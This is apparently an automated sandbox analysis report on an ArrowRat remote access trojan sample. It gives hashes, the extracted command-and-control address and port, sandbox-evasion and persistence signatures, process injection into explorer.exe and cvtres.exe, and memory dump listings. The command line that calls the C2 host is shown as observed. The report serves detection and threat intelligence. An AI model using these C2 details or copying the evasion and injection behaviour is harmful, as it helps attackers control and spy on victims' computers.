Overview

overview

10

Static

static

d629910646...f2.exe

windows7-x64

10

d629910646...f2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-08-2022 14:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe

  • Size

    409KB

  • MD5

    3aca4d9a22354045ff6fdcd0e666c585

  • SHA1

    66f89e387b82cdba9f33c9120bd9062ec49626b1

  • SHA256

    d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2

  • SHA512

    49e58b10b708a0e6c50c93d54b0c3ee20afb2f04ccbde3879964bc134e7acf5deaeb3a3ed49db2b295f5eb63b9cc36f4dda91523ad9004a4a2f9d75dd1311b9c

  • SSDEEP

    12288:s2oYr2iNix8e9TUUncNqJ8F2DbboP6252WjQYT:s2oYr1kxf9TUU1i4Hk64djt

Score
10/10
arrowratcscxmgevasionpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

CSCXMG

C2

185.143.223.73:1338

Mutex

584MAK

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 53 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe
    "C:\Users\Admin\AppData\Local\Temp\d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe"
    1⤵
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4312
    • C:\Users\Admin\AppData\Local\Temp\d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe
      "{path}"
      2⤵
        PID:4688
      • C:\Users\Admin\AppData\Local\Temp\d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe
        "{path}"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Windows\explorer.exe
          "C:\Windows\explorer.exe"
          3⤵
          • Modifies Installed Components in the registry
          • Enumerates connected drives
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2320
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" CSCXMG 185.143.223.73 1338 584MAK
          3⤵
            PID:3552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" CSCXMG 185.143.223.73 1338 584MAK
            3⤵
              PID:5036
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:1888
        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
          1⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:912

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\d629910646ed027d268ead062571a8d1a9033c03214112116194c70eae986df2.exe.log
          Filesize

          1KB

          MD5

          3aea5c16a0e7b995983bd1771d5ea11d

          SHA1

          5ce845c82ace7946cec271a8bac45572b977419c

          SHA256

          8d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f

          SHA512

          4d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243

          Download Submit

        • memory/912-305-0x0000027333B72000-0x0000027333B76000-memory.dmp

          Filesize

          16KB

          Download

        • memory/912-286-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-304-0x0000027333B72000-0x0000027333B76000-memory.dmp

          Filesize

          16KB

          Download

        • memory/912-281-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-306-0x0000027333B72000-0x0000027333B76000-memory.dmp

          Filesize

          16KB

          Download

        • memory/912-308-0x0000027333B72000-0x0000027333B76000-memory.dmp

          Filesize

          16KB

          Download

        • memory/912-319-0x0000027333B79000-0x0000027333B7C000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-295-0x0000027333800000-0x0000027333820000-memory.dmp

          Filesize

          128KB

          Download

        • memory/912-311-0x0000027333B76000-0x0000027333B79000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-290-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-280-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-312-0x0000027333B76000-0x0000027333B79000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-282-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-313-0x0000027333B76000-0x0000027333B79000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-154-0x000002732FCB8000-0x000002732FCC0000-memory.dmp

          Filesize

          32KB

          Download

        • memory/912-156-0x0000027333A30000-0x0000027333A50000-memory.dmp

          Filesize

          128KB

          Download

        • memory/912-158-0x0000027343B70000-0x0000027343C70000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/912-162-0x00000273335A0000-0x00000273335C0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/912-170-0x0000027333AD0000-0x0000027333AF0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/912-260-0x0000027330E40000-0x0000027330E60000-memory.dmp

          Filesize

          128KB

          Download

        • memory/912-314-0x0000027333B76000-0x0000027333B79000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-317-0x0000027333B79000-0x0000027333B7C000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-318-0x0000027333B79000-0x0000027333B7C000-memory.dmp

          Filesize

          12KB

          Download

        • memory/912-283-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-284-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-307-0x0000027333B72000-0x0000027333B76000-memory.dmp

          Filesize

          16KB

          Download

        • memory/912-285-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-287-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-288-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/912-289-0x0000027333B74000-0x0000027333B7F000-memory.dmp

          Filesize

          44KB

          Download

        • memory/952-140-0x0000000000400000-0x0000000000428000-memory.dmp

          Filesize

          160KB

          Download

        • memory/4312-132-0x0000000000790000-0x00000000007FC000-memory.dmp

          Filesize

          432KB

          Download

        • memory/4312-136-0x0000000005230000-0x000000000523A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4312-134-0x0000000005180000-0x0000000005212000-memory.dmp

          Filesize

          584KB

          Download

        • memory/4312-133-0x0000000005830000-0x0000000005DD4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/4312-137-0x0000000007550000-0x00000000075B6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4312-135-0x0000000005320000-0x00000000053BC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/5036-145-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

          Download

        • memory/5036-146-0x0000000005E30000-0x0000000005E80000-memory.dmp

          Filesize

          320KB

          Download